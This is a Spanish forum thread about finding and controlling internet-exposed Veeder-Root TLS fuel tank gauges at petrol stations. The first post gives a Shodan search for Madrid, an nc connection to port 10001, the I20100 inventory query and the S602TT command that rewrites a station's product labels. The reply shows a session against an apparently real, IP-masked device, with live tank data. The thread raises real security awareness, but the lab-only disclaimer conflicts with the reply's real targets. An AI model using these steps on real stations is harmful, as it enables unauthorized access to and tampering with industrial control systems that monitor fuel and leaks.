Resultados 1 al 2 de 2

Comando I20100 o cómo hackear gasolineras

  1. #1 Comando I20100 o cómo hackear gasolineras 
    HH Administrator Avatar de LUK
    Fecha de ingreso
    Oct 2001
    Ubicación
    SpaÑa
    Mensajes
    5.284
    Descargas
    223
    Uploads
    250
    Hace unos días leí este artículo de los dueños de Metasploit y se me quedó esa espinita clavada de saber cómo funcionan estos dispositivos.

    Estos últimos meses estoy metido en el mundo de ICS, investigando cómo conseguir comprometer estos dispositivos, por lo que no me podía quedar quieto.

    Tras comprender qué son los dispositivos TLS y cómo funcionan, me decidí a escribir este artículo.

    Lo primero de todo, ¿qué son estos dispositivos?

    Si buscamos información sobre ellos, nos encontramos con: “El TLS-350 es un sistema completamente integrado de reconciliación de stock del producto y detección de fugas. Está diseñado en base modular, lo que permite configurarlo según las necesidades de cada Estación de Servicio. El sistema modular significa que puede ser ampliado para satisfacer nuevas necesidades o adaptarlo a nuevas tecnologías. El sistema proporciona la calibración y reconciliación automática, y detección dinámica de fugas. También puede controlar una gama muy amplia de sensores, incluyendo el control intersticial típico de los tanques de doble pared. Para los tanques de pared sencilla, el sistema puede realizar la prueba de estanqueidad de los tanques, bien automáticamente o cuando se precise.” (https://zemos.es/depositos/tls.html#...0de%20Servicio).


    Esto realmente viene a ser traducido como que estos dispositivos pueden monitorizar niveles de combustible, autorizar suministros, monitorizar estados, alarmas, etc. y además se le pueden añadir módulos extra como expansiones de tarjetas tcp/ip, y aquí es donde radica el problema.

    Antes de empezar con el meollo del asunto vamos a ver en qué arquitecturas se pueden colocar:

    • Detrás del gateway: Esta sería una arquitectura más segura dado que el dispositivo TLS450 en este caso está detrás del gateway que controlaría las conexiones entrantes y se podría conectar mediante otros protocolos como RS232.




    • Directamente conectado a la red ethernet: este es otro tipo de arquitectura que se monta. El propio TLS-450 en este caso estaría directamente conectado a la red ethernet, con el peligro que conlleva si se deja expuesto a internet.



    Dado que este dispositivo, como hemos dicho antes, tiene la posibilidad de tarjetas de expansión es posible conectarle la siguiente tarjeta que nos permitiría usar el protocolo TCP/IP para conectar con él.


    Esto permitiría conectar la interfaz de consola serie a través del protocolo TCP/IP para poder administrar este dispositivo de una manera más cómoda a través de internet. Si se opta por implementar este módulo extra debemos tener presente que este dispositivo no está orientado a la seguridad dado que no está pensado para estar público en internet. Aquí es donde viene el famoso comando I20100, que explico a continuación, que viene tan bien explicado en su manual de la interfaz de uso de la consola serie:



    Bueno y pensaréis, ¿cómo funciona esto? Pues vamos a explicarlo a continuación:



    Bien, ahora busquemos esto en Shodan a ver cómo nos lo muestra. Para ello haremos esta sencilla search:
    Código:
    I20100 country:es city:"Madrid"
    (Recordad que hay que estar registrado en Shodan para poder utilizar filtros, de lo contrario solo puedes buscar "I20100" para hacer una prueba si no tienes usuario)


    He centrado un poco el tiro en Madrid dado que es mi ciudad por si me pilla de camino alguna de ellas…





    Como podéis apreciar, honeypots a parte, hay un buen número de surtidores aparentemente reales.

    Ahora bien, con toda esta información, ¿cómo puedo hacer consultas a estos surtidores?

    Lo primero, como dije antes, al ser una consola conectada a una tarjeta ethernet TCP/IP nos conectamos a través o bien telnet o nc lo que más rabia os dé. El comando será el siguiente:
    Código:
    nc -vvv <ip> <puerto>
    Normalmente, el puerto suele ser el 10001, pero puede variar, el -vvv es porque me gusta que rebose el verbose:



    Bien, hay conexión, pero … no hace nada. Bueno, ¡espera! Vamos a probar una cosa. Cuando esté la conexión activa antes de escribir el comando I20100 pulsamos CTRL+A y después escribimos el susodicho comando y ¡voila!



    Bien, vale, hasta ahí ha llegado la gente de Rapid7 también, y además con Nmap también se pueden escanear este tipo de dispositivos con el comando: nmap --script atg-info -p 10001 <host>

    Vamos a mirar en su manual de referencia de function codes que más cosas podemos hacer. Lo podéis encontrar aquí https://cdn.chipkin.com/files/liz/576013-635.pdf

    Vamos a usar ahora el comando S602TT para cambiar la etiqueta del producto del surtidor:


    Como se puede observar TT es el número de surtidor, vamos con lo siguiente entonces:



    Cada vez que se introduce el comando (recuadro azul) siempre tiene que ser pulsado el CTRL-A antes de introducir texto y presionar enter.
    Si solo queremos modificar el surtidor 1 el comando introducido sería el siguiente: S60201Hack by hackplayers.

    Como se puede apreciar, estos dispositivos cuando están expuestos en internet son muy vulnerables a la modificación por personas no autorizadas. Aunque este artículo se centra en un par de comandos que pueden ser introducidos, que no entrañan ningún tipo de riesgo, existen comandos más peligrosos que pueden generar alertas con el riesgo que ello conlleva a las estaciones de servicio.

    Antes de acabar quería aclarar que todas estas pruebas se han realizado sobre máquinas simuladas en laboratorio, siempre con el motivo principal de enseñar y aprender cómo realizar este tipo de ejercicios para así mejorar la seguridad. El autor de este artículo no se hace responsable del mal uso que se pueda dar a esta información.

    Happy hacking!
    Contribución gracias a Carlos Antonini para hackplayers
    [][][] LUK [][][]
    hackhispano.com
    Citar  
     

  2. #2  
    Medio Avatar de tejón
    Fecha de ingreso
    Jan 2017
    Ubicación
    Madriguera
    Mensajes
    67
    Descargas
    0
    Uploads
    0
    Pues con el dinero que sacan ya podrían simplemente poner un firewall permitiendo solo acceso desde ciertas IPs... Abrir directamente el sensor a internet parece de locos pero veo mas de 80 solo en Madrid... 174 en España... y mas de 10.000 en el mundo ... en fin... espero que la gente utilice esta info con prudencia. Y gracias por publicarlo ya que solo así se da visibilidad de ciertas ñapas

    Comprobado que se pueden ver los datos
    Código:
    nc -vvv X.X.X.X 10001
    Connection to X.X.X.X port 10001 [tcp/scp-config] succeeded!
    ^AI20100
    
    I20100
        12-09-23 13:44
    
    
    INVENTARIO EN TANQUE
    
    PRODUCTO TANQ              VOL    VOL CT    POR LL   ALTURA    AGUA      TEMP
      1  GAS A1               14488     14341     3847   1456.4      0.0    28.17
      2  SP95                  9719      9572     9780   1076.9      0.0    27.74
      3  GAS A2               10950     10832     8550   1182.6      0.0    28.47
      4  GAS A3               10772     10662     8728   1181.8      0.0    27.98
      5  GASOLEO B             4163      4121    15336    568.3      0.0    27.48
    Citar  
     

Temas similares

  1. Como hackear por me dio de Protocolo TCP/IP
    Por CyBerNovato en el foro VULNERABILIDADES
    Respuestas: 1
    Último mensaje: 12-06-2012, 14:37
  2. como hackear
    Por gerardo_gf en el foro INGENIERIA INVERSA
    Respuestas: 1
    Último mensaje: 03-05-2006, 03:17
  3. Como Hackear un Ftp?
    Por manga_nt en el foro HACK HiSPANO
    Respuestas: 6
    Último mensaje: 17-09-2002, 13:06
  4. como hackear pag de frontpage?
    Por NAro en el foro HACK HiSPANO
    Respuestas: 4
    Último mensaje: 12-09-2002, 12:22

Marcadores

Marcadores